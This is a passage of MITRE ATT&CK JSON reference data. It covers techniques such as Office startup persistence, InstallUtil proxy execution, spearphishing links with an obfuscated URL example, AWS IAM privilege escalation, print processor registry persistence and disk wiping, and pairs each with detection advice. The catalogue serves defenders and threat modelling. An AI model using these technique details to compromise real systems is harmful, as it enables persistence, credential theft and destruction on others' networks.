Startup", "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Nick Carr, Mandiant", "Microsoft Threat Intelligence Center (MSTIC)", "Sahar Shukrun", "Praetorian", "Loic Jaquemet", "Ricardo Dias"], "x_mitre_detection": "Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.\n\nMany Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)\n\nMicrosoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1137", "external_id": "T1137"}, {"source_name": "SensePost Ruler GitHub", "description": "SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019.", "url": "https://github.com/sensepost/ruler"}, {"source_name": "TechNet O365 Outlook Rules", "description": "Koeller, B.. (2018, February 21). Defending Against Rules and Forms Injection. Retrieved November 5, 2019.", "url": "https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/"}, {"source_name": "CrowdStrike Outlook Forms", "description": "Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral Movement and Persistence. Retrieved February 5, 2019.", "url": "https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746"}, {"source_name": "Outlook Today Home Page", "description": "Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019.", "url": "https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943"}, {"source_name": "Microsoft Detect Outlook Forms", "description": "Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.", "url": "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack"}, {"source_name": "SensePost NotRuler", "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.", "url": "https://github.com/sensepost/notruler"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "InstallUtil", "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Travis Smith, Tripwire", "Casey Smith"], "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Digital Certificate Validation", "Application control"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", "created": "2020-01-23T19:09:48.811Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/004", "external_id": "T1218.004"}, {"source_name": "MSDN InstallUtil", "description": "Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.", "url": "https://msdn.microsoft.com/en-us/library/50614e95.aspx"}, {"source_name": "LOLBAS Installutil", "description": "LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Installutil/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:02.197Z", "name": "Monitor Process State", "description": "Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Network Traffic: Network Traffic Content", "Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0801", "external_id": "T0801"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-19T13:26:16.082Z", "name": "Spearphishing Link", "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an \u201c@\u201d symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)\n\nAdversaries may also embed \u201ctracking pixels\u201d, \"web bugs\", or \"web beacons\" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug) (Citation: Ryte Wiki) These mechanisms often appear as small images (typically one pixel in size) or otherwise obfuscated objects and are typically delivered as HTML code containing a link to a remote server. (Citation: Ryte Wiki)(Citation: IAPP)\n\nAdversaries may also be able to spoof a complete website using what is known as a \"browser-in-the-browser\" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)\n\nAdversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to perform adversary-in-the-middle phishing by proxying the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004).(Citation: Proofpoint Human Factor)\n\nAdversaries may also send a malicious link in the form of Quick Response (QR) Codes (also known as \u201cquishing\u201d). These links may direct a victim to a credential phishing page.(Citation: QR-campaign-energy-firm) By using a QR code, the URL may not be exposed in the email and may thus go undetected by most automated email security scans.(Citation: qr-phish-agriculture) These QR codes may be scanned by or delivered directly to a user\u2019s mobile device (i.e., [Phishing](https://attack.mitre.org/techniques/T1660)), which may be less secure in several relevant ways.(Citation: qr-phish-agriculture) For example, mobile users may not be able to notice minor differences between genuine and credential harvesting websites due to mobile\u2019s smaller form factor.\n\nFrom the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Philip Winther", "Sebastian Salla, McAfee", "Menachem Goldstein", "Robert Simmons, @MalwareUtkonos", "Elpidoforos Maragkos, @emaragkos", "Joas Antonio dos Santos, @C0d3Cr4zy", "Austin Herrin", "Obsidian Security", "Sam Seabrook, Duke Energy"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nMonitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.6", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230", "created": "2020-10-02T17:09:50.723Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1598/003", "external_id": "T1598.003"}, {"source_name": "ACSC Email Spoofing", "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf"}, {"source_name": "TrendMictro Phishing", "description": "Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.", "url": "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html"}, {"source_name": "IAPP", "description": "IAPP. (n.d.). Retrieved March 5, 2024.", "url": "https://iapp.org/resources/article/web-beacon/"}, {"source_name": "QR-campaign-energy-firm", "description": "Jonathan Greig. (2023, August 16). Phishing campaign used QR codes to target large energy company. Retrieved November 27, 2023.", "url": "https://therecord.media/phishing-campaign-used-qr-codes-to-target-energy-firm"}, {"source_name": "PCMag FakeLogin", "description": "Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.", "url": "https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages"}, {"source_name": "Microsoft Anti Spoofing", "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide"}, {"source_name": "Mr. D0x BitB 2022", "description": "mr.d0x. (2022, March 15). Browser In The Browser (BITB) Attack. Retrieved March 8, 2023.", "url": "https://mrd0x.com/browser-in-the-browser-phishing-attack/"}, {"source_name": "Mandiant URL Obfuscation 2023", "description": "Nick Simonian. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved August 4, 2023.", "url": "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse"}, {"source_name": "NIST Web Bug", "description": "NIST Information Technology Laboratory. (n.d.). web bug. Retrieved March 22, 2023.", "url": "https://csrc.nist.gov/glossary/term/web_bug"}, {"source_name": "Proofpoint Human Factor", "description": "Proofpoint. (n.d.). The Human Factor 2023: Analyzing the cyber attack chain. Retrieved July 20, 2023.", "url": "https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-human-factor-report.pdf"}, {"source_name": "Ryte Wiki", "description": "Ryte Wiki. (n.d.). Retrieved March 5, 2024.", "url": "https://en.ryte.com/wiki/Tracking_Pixel"}, {"source_name": "qr-phish-agriculture", "description": "Tim Bedard and Tyler Johnson. (2023, October 4). QR Code Scams & Phishing. Retrieved November 27, 2023.", "url": "https://www.proofpoint.com/us/blog/email-and-cloud-threats/cybersecurity-stop-month-qr-code-phishing"}, {"source_name": "ZScaler BitB 2020", "description": "ZScaler. (2020, February 11). Fake Sites Stealing Steam Credentials. Retrieved March 8, 2023.", "url": "https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-08-11T20:24:03.069Z", "name": "SSH", "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\n\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user\u2019s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Use of SSH may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nOn macOS systems log show --predicate 'process = \"sshd\"' can be used to review incoming SSH connection attempts for suspicious activity. The command log show --info --predicate 'process = \"ssh\" or eventMessage contains \"ssh\"' can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nOn Linux systems SSH activity can be found in the logs located in /var/log/auth.log or /var/log/secure depending on the distro you are using.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["An SSH server is configured and running."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", "created": "2020-02-11T18:27:15.774Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1021/004", "external_id": "T1021.004"}, {"source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing", "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.", "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-03-29T18:29:06.873Z", "name": "Additional Cloud Roles", "description": "An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)\n(Citation: Microsoft O365 Admin Roles) \n\nThis account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.\n\nFor example, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)\n\nIn some cases, adversaries may add roles to adversary-controlled accounts outside the victim cloud tenant. This allows these external accounts to perform actions inside the victim tenant without requiring the adversary to [Create Account](https://attack.mitre.org/techniques/T1136) or modify a victim-owned account.(Citation: Invictus IR DangerDev 2024)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Microsoft Threat Intelligence Center (MSTIC)", "Alex Parsons, Crowdstrike", "Chris Romano, Crowdstrike", "Wojciech Lesicki", "Pi\u00e0 Consigny, Tenable", "Cl\u00e9ment Notin, Tenable", "Praetorian", "Alex Soler, AttackIQ", "Arad Inbar, Fidelis Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Collect activity logs from IAM services and cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Office 365", "IaaS", "SaaS", "Google Workspace", "Azure AD"], "x_mitre_version": "2.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "created": "2020-01-19T16:59:45.362Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1098/003", "external_id": "T1098.003"}, {"source_name": "Expel AWS Attacker", "description": " Brian Bahtiarian, David Blanton, Britton Manahan and Kyle Pellett. (2022, April 5). Incident report: From CLI to console, chasing an attacker in AWS. Retrieved April 7, 2022.", "url": "https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/"}, {"source_name": "Microsoft O365 Admin Roles", "description": "Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. al.. (2019, October 8). About admin roles. Retrieved October 18, 2019.", "url": "https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide"}, {"source_name": "AWS IAM Policies and Permissions", "description": "AWS. (n.d.). Policies and permissions in IAM. Retrieved April 1, 2022.", "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html"}, {"source_name": "Google Cloud IAM Policies", "description": "Google Cloud. (2022, March 31). Understanding policies. Retrieved April 1, 2022.", "url": "https://cloud.google.com/iam/docs/policies"}, {"source_name": "Invictus IR DangerDev 2024", "description": "Invictus Incident Response. (2024, January 31). The curious case of DangerDev@protonmail.me. Retrieved March 19, 2024.", "url": "https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me"}, {"source_name": "Microsoft Support O365 Add Another Admin, October 2019", "description": "Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.", "url": "https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d"}, {"source_name": "Rhino Security Labs AWS Privilege Escalation", "description": "Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation \u2013 Methods and Mitigation. Retrieved May 27, 2022.", "url": "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:02.398Z", "name": "Scripting", "description": "Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions. \n\nIn addition to being a useful tool for developers and administrators, scripting language interpreters may be abused by the adversary to execute code in the target environment. Due to the nature of scripting languages, this allows for weaponized code to be deployed to a target easily, and leaves open the possibility of on-the-fly scripting to perform a task.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Command: Command Execution", "Process: Process Creation", "Module: Module Load", "Script: Script Execution"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0853", "external_id": "T0853"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-04T14:16:17.655Z", "name": "Print Processors", "description": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)\n\nAdversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry key that points to the DLL.\n\nFor the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the GetPrintProcessorDirectory API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)\n\nThe print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Mathieu Tartare, ESET", "Tahseen Bin Taj"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\\\Driver or HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\Driver as they pertain to print processor installations.\n\nMonitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", "created": "2020-10-05T13:24:49.780Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/012", "external_id": "T1547.012"}, {"source_name": "Microsoft AddPrintProcessor May 2018", "description": "Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved October 5, 2020.", "url": "https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor"}, {"source_name": "Microsoft Intro Print Processors", "description": "Microsoft. (2023, June 26). Introduction to print processors. Retrieved September 27, 2023.", "url": "https://learn.microsoft.com/windows-hardware/drivers/print/introduction-to-print-processors"}, {"source_name": "ESET PipeMon May 2020", "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020.", "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Disabling Security Tools", "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting may be suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["File monitoring", "Host intrusion prevention systems", "Signature-based detection", "Log analysis", "Anti-virus"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2e0dd10b-676d-4964-acd0-8a404c92b044", "created": "2017-05-31T21:31:07.958Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1089", "external_id": "T1089"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/578.html", "external_id": "CAPEC-578"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Disk Structure Wipe", "description": "Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) if all sectors of a disk are wiped.\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the master 